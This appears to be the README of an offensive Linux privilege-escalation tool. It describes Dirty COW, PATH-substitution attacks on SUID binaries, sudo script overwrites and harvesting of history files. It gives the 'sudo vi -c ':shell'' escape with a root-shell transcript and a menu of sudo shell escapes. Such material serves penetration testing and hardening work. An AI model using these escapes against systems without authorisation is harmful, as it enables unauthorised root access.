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This tool proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.

dirty COW : exploits a race condition in the implementation of the copy-on-write mechanism Link :

Pa(th)zuzu : Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID) Link :

Extra features

VSP : checks if the user is able to overwrite a sudo-enabled command with his own

History : checks for * history (like bash_history) files. You could be lucky!

b3 : tries to substitute commands that has root privileges [sudo -l >>> User may run the following commands ... (root) NOPASSWD: /path/to/script]

Example: If a user has sudo privileges only on vi, he could become root by runnuing this command: sudo vi -c ':shell'

b3rito@victim ~/Desktop $ sudo vi -c ':shell'
[sudo] password for b3rito:
victim Desktop # whoami


Written by b3rito at mes3hacklab


chmod +x



b3rito@victim ~/Desktop $ ./
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        .$~+$....7Z.$$$7M.?+=$..,M8 .Z.I., M,ZZZ.MM..7+?+77..7..
          .. ...$.MM.....MZ$~Z:Z,MM.O$,$7,MZ .NMM.~77.+?+.7...
             I7~Z....MM .M7Z....?MMO,Z..$.M 8MM ..=77I=~?..I~.
        .$7I7?.+...$...:MMM. .$=OMM?Z,,..MMMMMMMMMMMMMI..=Z$+...
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                  DMO         .8°O88    DMO8M       .8°O88
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          .    .  :=D7Z8MM.   .M:   .. .MD.. .7D~. ..,.O. .. 
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                  ~.             N.                                         
Possible options (‡ excluded):
 [·] find
 [·] vi
 [·] b3

 Select From the menu:

   1) Find                8) Man  *               17) Pathzuzu °‡
   2) AWK                10) Dirty COW °‡         18) History °‡
   3) Nmap               11) Gdb                  19) Vim
   4) Vi                 12) Ruby                 20) Lua
   5) Python             13) b3                   21) Ftp *
   6) Irb                14) Perl                 22) Credits
   7) Less *             15) Tee                  23) Update
   8) More *             16) VSP °‡               99) Exit
 VSP = Vulnerable Script Permissions
 Pathzuzu = SUID exploitation through Path vulnerability
 b3 = editable root privileged commands listed in 'sudo -l'
 * user interatcion
 ° sudo not required
Enter Number: 1
[sudo] password for b3rito:
victim Desktop # whoami
victim Desktop #


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